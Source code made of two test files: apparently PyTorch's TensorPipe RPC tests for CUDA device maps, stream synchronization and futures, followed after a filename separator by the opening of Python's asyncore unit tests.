@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@staticmethod
def _gpu_add_multi_gpu(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 0]):
return x.to(0) + y, x - y.to(1)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_multi_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(1)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(x, y)
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_multi_gpu(dst)
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_multi_gpu(dst)
@staticmethod
def _gpu_add_return_to_gpu(x, y):
if x.device.type == 'cpu' and y.device.type == 'cpu':
return (x + y).to(0), (x - y).to(1), (x * y).to(2), (x / y).to(3)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_in_options(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
init_method=options.init_method,
num_worker_threads=options.num_worker_threads,
device_maps={dst: {0: 1, 1: 0}}
)
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(torch.zeros(2).to(0), torch.ones(2).to(1))
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
def _test_device_maps_return_to_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 2})
options.set_device_map(dst, {2: 3})
options.set_device_map(dst, {3: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_return_to_gpu,
args=(torch.zeros(2), torch.ones(2))
)
for i in range(len(rets)):
self.assertEqual(rets[i].device, torch.device((3 + i) % 4))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(3))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
self.assertEqual(rets[2], (torch.zeros(2) * torch.ones(2)).to(1))
self.assertEqual(rets[3], (torch.zeros(2) / torch.ones(2)).to(2))
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_return_to_gpu(dst)
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_return_to_gpu(dst)
@staticmethod
def _add_to_gpu(x, y):
return (x + y).to(0)
def _test_device_maps_missing_config(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = (
"TensorPipe RPC backend only supports CPU tensors by default.*"
"`set_device_map` on `TensorPipeRpcBackendOptions`"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(dst, torch.add, args=(torch.zeros(2).to(0), 1))
elif mode == RPCExecMode.REMOTE:
rpc.remote(dst, torch.add, args=(torch.zeros(2).to(0), 1)).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
def _test_device_maps_missing_config_response(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = "Response device mapping is not available"
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
elif mode == RPCExecMode.REMOTE:
rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config(self):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
def test_device_maps_missing_config_not_timeout(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options
)
timeout = rpc.get_rpc_timeout()
tik = time.time()
self._test_device_maps_missing_config(RPCExecMode.SYNC)
rpc.shutdown()
tok = time.time()
self.assertTrue(tok - tik < timeout)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote(self):
self._test_device_maps_missing_config(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(2)
def test_device_maps_remote(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
self.assertEqual(rref.to_here().device.index, 1)
self.assertEqual(rref.to_here(), torch.ones(2).to(1))
rpc.shutdown()
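# _slow_add_on_user_stream below enqueues the addition on a side stream behind a
# long busy-wait kernel and then hands the result back to the current stream. The
# custom-stream tests that follow check that results observed through RPC reflect
# that delayed work rather than stale values.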
@staticmethod
def _slow_add_on_user_stream(x, y):
s0 = torch.cuda.current_stream(x.device)
s1 = torch.cuda.Stream(device=x.device)
s1.wait_stream(s0)
x.record_stream(s1)
y.record_stream(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
z = x + y
s0.wait_stream(s1)
z.record_stream(s0)
return z
def _test_custom_stream(self, fn, device_map):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
fn(dst)
rpc.shutdown()
def _test_stream_sync(self, dst):
x = torch.ones(2, 2).to(0)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
self.assertEqual(ret, 2 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream(self):
self._test_custom_stream(self._test_stream_sync, {"cuda:0": "cuda:1"})
def _test_stream_multi_async(self, dst):
futs = []
for i in range(20):
x = torch.ones(2, 2).to(0) * i
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
)
for i in range(20):
self.assertEqual(futs[i].wait(), 2 * torch.ones(2, 2).to(0) * i)
@skip_if_lt_x_gpu(2)
def test_custom_stream_multi(self):
self._test_custom_stream(
self._test_stream_multi_async,
{"cuda:0": "cuda:1"}
)
@staticmethod
def _nested_slow_add_on_user_stream(dst, x, y, z):
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, y)
)
return TensorPipeAgentCudaRpcTest._slow_add_on_user_stream(ret, z)
def _test_stream_nested_sync(self, dst):
x = torch.ones(2, 2).to(0)
y = torch.ones(2, 2).to(0) * 2
z = torch.ones(2, 2).to(0) * 3
nested_dst = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
self.assertEqual(ret, 6 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested(self):
self._test_custom_stream(
self._test_stream_nested_sync,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
def _test_stream_nested_multi_async(self, dst):
if self.rank == 0:
futs = []
n = 5
xs, ys, zs = [], [], []
for i in range(n):
x = torch.ones(2, 2).to(0) * (i - 1)
y = torch.ones(2, 2).to(0) * i
z = torch.ones(2, 2).to(0) * (i + 1)
xs.append(x)
ys.append(y)
zs.append(z)
nested_dst = worker_name((self.rank + 2) % self.world_size)
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
)
for i in range(n):
self.assertEqual(futs[i].wait(), xs[i] + ys[i] + zs[i])
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested_multi(self):
self._test_custom_stream(
self._test_stream_nested_multi_async,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
@staticmethod
def _gpu_add_wrong_gpus(x, y):
if x.is_cuda and y.is_cuda:
return x.cpu() + y.cuda()
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(1)
def test_device_mismatch(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(0)
with self.assertRaisesRegex(
RuntimeError,
"Expected all tensors to be on the same device, but found at least two devices"
):
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_wrong_gpus,
args=(x, y)
)
rpc.shutdown()
def _test_rref_synchronization(self, local_device, remote_device):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device : remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN on MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
x = torch.randn(200, 1, 28, 28).to(local_device)
actual = rref.remote().forward(x).to_here()
expected = rref.rpc_sync().forward(x)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_to_here_synchronization1(self):
self._test_rref_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization2(self):
self._test_rref_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization3(self):
self._test_rref_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization4(self):
self._test_rref_synchronization("cuda:0", "cuda:1")
def _test_rref_as_arg_synchronization(
self,
local_device,
remote_device,
devicesOptions=None
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device: remote_device})
input_src = worker_name((self.rank - 1 + self.world_size) % self.world_size)
options.set_device_map(input_src, {remote_device: local_device})
if devicesOptions is not None:
options.set_devices(devicesOptions[self.rank])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN on MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_x = RRef(torch.randn(200, 1, 28, 28).to(local_device))
actual = rref.remote().forward(rref_x, True).to_here()
expected = rref.rpc_sync().forward(rref_x, True)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization1(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization2(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization3(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization4(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization5(self):
self._test_rref_as_arg_synchronization(
"cuda:0",
"cuda:0",
[["cuda:0"] for _ in range(4)], # devicesOptions
)
@staticmethod
def _rref_relay(rref):
return rref.to_here()
def _test_rref_forward_synchronization(self, local_device, remote_device):
options = self.rpc_backend_options
input_src = worker_name(0)
model_dst = worker_name(1)
out_relay = worker_name(2)
if self.rank == 0:
# for 1) model construction 2) forward execution
options.set_device_map(model_dst, {local_device: remote_device})
# Forward output will be first copied to the relay node before
# returning to the worker. This is intentional, to test RRef
# forward CUDA stream synchronizations.
options.set_device_map(out_relay, {local_device: local_device})
elif self.rank == 1:
# worker1 hosts the model and runs forward. The forward function
# calls RRef.to_here(), so it needs to configure the device map
options.set_device_map(input_src, {remote_device: local_device})
elif self.rank == 2:
# worker2 receives the output RRef and calls to_here() on it, so it
# needs to configure the device map as well.
options.set_device_map(model_dst, {local_device: remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 0:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN on MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(model_dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_input = RRef(torch.randn(200, 1, 28, 28).to(local_device))
rref_out = rref.remote().forward(rref_input, True)
out = rpc.remote(
out_relay,
TensorPipeAgentCudaRpcTest._rref_relay,
args=(rref_out,)
).to_here()
expected = rref.rpc_sync().forward(rref_input, True)
self.assertEqual(out, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_forward_synchronization1(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization2(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization3(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization4(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:1")
def _test_owner_rref_forward_synchronization(self, local_device, remote_device):
if self.rank == 0:
options = self.rpc_backend_options
options.set_device_map("w0", {local_device: remote_device})
rpc.init_rpc(
"w0",
rank=0,
world_size=1,
rpc_backend_options=options
)
model = rpc.remote(
"w0", torch.nn.Linear, (2048, 20000)
).remote().to(remote_device)
for _ in range(30):
data = torch.rand(2048, 2048).to(local_device)
output = model.rpc_sync().forward(data)
# to_here() internally calls localValue as the caller is
# the owner of the RRef.
v0 = rpc.RRef(output).remote().sum().to_here().item()
v1 = output.sum().item()
self.assertEqual(v0, v1)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_owner_rref_forward_synchronization1(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization2(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization3(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization4(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:1")
@staticmethod
def _return_tensor_view(i):
x = torch.ones(1000, 200).cuda(0) * i
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
# serialization of the return value will create a new tensor from the
# view, which is done outside of the user function.
return x.split(100)[0]
@skip_if_lt_x_gpu(1)
def test_tensor_view_as_return_value(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
futs = []
for i in range(5):
futs.append(rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._return_tensor_view,
args=(i,)
))
for i in range(5):
self.assertEqual(torch.ones(100, 200) * i, futs[i].wait())
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected source devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
options.set_devices([1])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch_reverse(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected target devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
device_maps={dst: {0 : 1}},
devices=[0]
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_int(self):
fut = Future(devices=[0])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_str(self):
fut = Future(devices=["cuda:0"])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_device(self):
fut = Future(devices=[torch.device("cuda", 0)])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_not_cuda(self):
with self.assertRaisesRegex(
ValueError, "Expected devices to have indices, got cpu"
):
fut = Future(devices=["cpu"])
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=False
)
@skip_if_lt_x_gpu(2)
def test_cuda_future_callback_changes_devices(self):
# We check proper CUDA stream synchronization by filling the tensor with
# the expected value in one stream, and reading it from another stream.
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:0", "cuda:1"])
def cb(fut):
t0 = fut.value()
tensor1.copy_(t0, non_blocking=True)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(2)
def test_cuda_future_value_on_bad_device(self):
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:1"])
# As a plus, we test that futures still invoke callbacks even in case of
# error, and that the child futures are successful if those callbacks
# don't access the parent future.
def cb(fut):
with torch.cuda.device("cuda:1"):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor1.fill_(1)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with self.assertRaisesRegex(
ValueError,
r"The result contained tensors residing on device\(s\) cuda:0 "
r"which are not among the expected device\(s\) cuda:1",
):
parent_future.wait()
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(1)
def test_async_execution_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
t = torch.zeros((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_sleep_and_set_to_one, args=(t,))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 1).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_async_execution_nested_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
nested_dst = worker_name((self.rank + 2) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
a = torch.ones((100,), device="cuda:0")
b = torch.ones((100,), device="cuda:0")
c = torch.ones((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_nested_add, args=(nested_dst, a, b, c))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 3).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_modify_tensor_inplace(self):
tensor = torch.zeros((100,), device="cuda:0")
future = Future(devices=["cuda:0"])
future.set_result(tensor)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
tensor.fill_(1)
future.wait()
@skip_if_lt_x_gpu(1)
def test_cuda_future_replace_tensor(self):
tensor_list = [torch.zeros((100,), device="cuda:0")]
future = Future(devices=["cuda:0"])
future.set_result(tensor_list)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
# We set things up so that the original tensor contained in the list
# gets deleted once we replace it with the other one. This will
# invalidate any cached information held by the future.
tensor_list[0] = torch.ones((100,), device="cuda:0")
future.wait()
@skip_if_lt_x_gpu(1)
def test_rref_with_unpickleable_attributes(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(dst, TensorWrapper, args=(torch.zeros(42, device="cuda:0"),))
rref.rpc_sync().increase(1)
ret = rref.rpc_sync().sum()
self.assertEqual(ret, 42)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=True
)
|
test_asyncore.py
|
import asyncore
import unittest
import select
import os
import socket
import threading
import sys
import time
import errno
from test import support
from test.support import TESTFN, run_unittest, unlink
from io import BytesIO
from io import StringIO
HOST = support.HOST
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen(5)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
while n > 0:
r, w, e = select.select([conn], [], [])
if r:
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b'\n', b''))
if b'\n' in data:
break
n -= 1
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubble all the way up through the asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
